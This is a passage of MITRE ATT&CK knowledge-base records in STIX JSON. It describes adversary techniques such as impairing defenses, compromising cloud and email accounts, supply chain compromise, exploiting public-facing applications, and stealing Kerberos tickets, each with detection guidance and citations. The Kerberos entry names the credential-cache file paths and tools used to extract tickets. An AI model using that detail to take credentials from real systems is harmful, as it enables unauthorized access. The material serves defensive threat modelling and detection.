(2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack"}, {"source_name": "Pfammatter - Hidden Inbox Rules", "description": "Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.", "url": "https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/"}, {"source_name": "SensePost NotRuler", "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", "url": "https://github.com/sensepost/notruler"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-20T16:43:53.391Z", "name": "Impair Defenses", "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.\n\nMonitor environment variables and APIs that can be leveraged to disable security measures.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "IaaS", "Linux", "macOS", "Containers", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Signature-based detection", "Host intrusion prevention systems", "File monitoring", "Digital Certificate Validation", "Host forensic analysis", "Log analysis", "Firewall"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "created": "2020-02-21T20:22:13.470Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562", "external_id": "T1562"}, {"source_name": "Emotet shutdown", "description": "The DFIR Report. (2022, November 8). Emotet Strikes Again \u2013 LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.", "url": "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-10-21T14:21:57.991Z", "name": "Cloud Accounts", "description": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nA variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Francesco Bigarella"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a", "created": "2022-05-27T14:30:01.904Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1586/003", "external_id": "T1586.003"}, {"source_name": "Awake Security C2 Cloud", "description": "Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.", "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/"}, {"source_name": "MSTIC Nobelium Oct 2021", "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.", "url": "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-04-11T01:07:48.218Z", "name": "Email Accounts", "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Tristan Bennett, Seamless Intelligence", "Bryan Onel"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", "created": "2020-10-01T01:20:53.104Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1586/002", "external_id": "T1586.002"}, {"source_name": "AnonHBGary", "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/"}, {"source_name": "Microsoft DEV-0537", "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.", "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-04-05T16:34:58.587Z", "name": "Automated Collection", "description": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Script: Script Execution", "Command: Command Execution", "File: File Access", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0802", "external_id": "T0802"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-04-11T23:22:49.534Z", "name": "Upload Malware", "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Kobi Haimovich, CardinalOps", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e", "created": "2021-03-17T20:09:13.222Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1608/001", "external_id": "T1608.001"}, {"source_name": "Volexity Ocean Lotus November 2020", "description": "Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.", "url": "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/"}, {"source_name": "Talos IPFS 2022", "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.", "url": "https://blog.talosintelligence.com/ipfs-abuse/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-26T14:23:37.009Z", "name": "Supply Chain Compromise", "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Veeral Patel"], "x_mitre_deprecated": false, "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1195", "external_id": "T1195"}, {"source_name": "Avast CCleaner3 2018", "description": "Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.", "url": "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities"}, {"source_name": "Command Five SK 2011", "description": "Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.", "url": "https://www.commandfive.com/papers/C5_APT_SKHack.pdf"}, {"source_name": "IBM Storwize", "description": "IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.", "url": "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E"}, {"source_name": "Symantec Elderwood Sept 2012", "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf"}, {"source_name": "Schneider Electric USB Malware", "description": "Schneider Electric. (2018, August 24). Security Notification \u2013 USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019.", "url": "https://www.se.com/ww/en/download/document/SESN-2018-236-01/"}, {"source_name": "Trendmicro NPM Compromise", "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.", "url": "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets"}, {"source_name": "Microsoft Dofoil 2018", "description": "Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.", "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:04.376Z", "name": "Block Reporting Message", "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Operational Databases: Process/Event Alarm", "Process: Process Termination", "Application Log: Application Log Content", "Network Traffic: Network Traffic Flow", "Operational Databases: Process History/Live Data"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0804", "external_id": "T0804"}, {"source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"}, {"source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-11-28T21:27:35.373Z", "name": "Exploit Public-Facing Application", "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Yossi Weizman, Azure Defender Research Team", "Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Network", "Linux", "macOS", "Containers"], "x_mitre_version": "2.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1190", "external_id": "T1190"}, {"source_name": "CWE top 25", "description": "Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.", "url": "https://cwe.mitre.org/top25/index.html"}, {"source_name": "CIS Multiple SMB Vulnerabilities", "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.", "url": "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/"}, {"source_name": "Wired Russia Cyberwar", "description": "Greenberg, A. (2022, November 10). Russia\u2019s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.", "url": "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/"}, {"source_name": "Mandiant Fortinet Zero Day", "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.", "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"}, {"source_name": "NVD CVE-2016-6662", "description": "National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6662"}, {"source_name": "NVD CVE-2014-7169", "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "OWASP Top 10", "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.", "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"}, {"source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-01T16:58:02.395Z", "name": "Steal or Forge Kerberos Tickets", "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as \u201crealms\u201d, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tim (Wadhwa-)Brown", "Cody Thomas, SpecterOps"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\n\nMonitor for unusual processes accessing\u00a0secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Kerberos authentication enabled"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "created": "2020-02-11T19:12:46.830Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1558", "external_id": "T1558"}, {"source_name": "CERT-EU Golden Ticket Protection", "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", "url": 